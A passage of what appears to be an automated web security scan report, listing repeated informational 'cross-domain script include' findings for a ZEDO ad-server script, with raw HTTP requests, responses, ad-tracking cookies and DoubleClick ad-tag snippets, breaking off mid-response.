Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.11769822893408416 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=5:4:1:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:0,1,1:0,1,1:0,1,1:1,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:0,1,1:0,1,1:0,1,1:2,1,1;expires=Tue, 24 May 2011 16:46:23 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:5:4:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=238
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:23 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.64. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9251405538277346 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=62:52:51:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=53:62:51:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=62
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:52 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=53%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=53%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.65. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.7174333122017302 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=24:24:22:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:3,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:3,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:39 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=25:24:22:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=102
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:39 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
O0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5108358.3;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=25%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=25%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.66. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.8862097934350706 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=18:19:17:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:18:17:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:19 GMT
Connection: close
Content-Length: 2124

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.11;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921884%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=20%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=20%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.67. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.21106055033186471 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=30:30:28:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=29:30:30:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:57 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=29%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=29%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.68. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.41092619470046715 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=35:36:35:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=36:35:36:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=55
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:26 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=36%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=36%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.69. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9605442887666107 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=49:48:53:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=50:48:53:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=104
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:10 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=50%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=50%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.70. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.3586552482197452 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=2:1:1:None; FFCap=1574B809,210132,210841|1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841|1,1,1:1,1,1;expires=Tue, 24 May 2011 16:47:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=201
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:00 GMT
Connection: close
Content-Length: 2073

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.71. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.26509648644882005 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=21:21:22:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:30 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=23:21:21:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=111
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:30 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
O0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5108358.3;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=23%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=23%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.72. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.1735954301565018 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=11:10:12:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:48 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=13:11:10:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:48 GMT
Connection: close
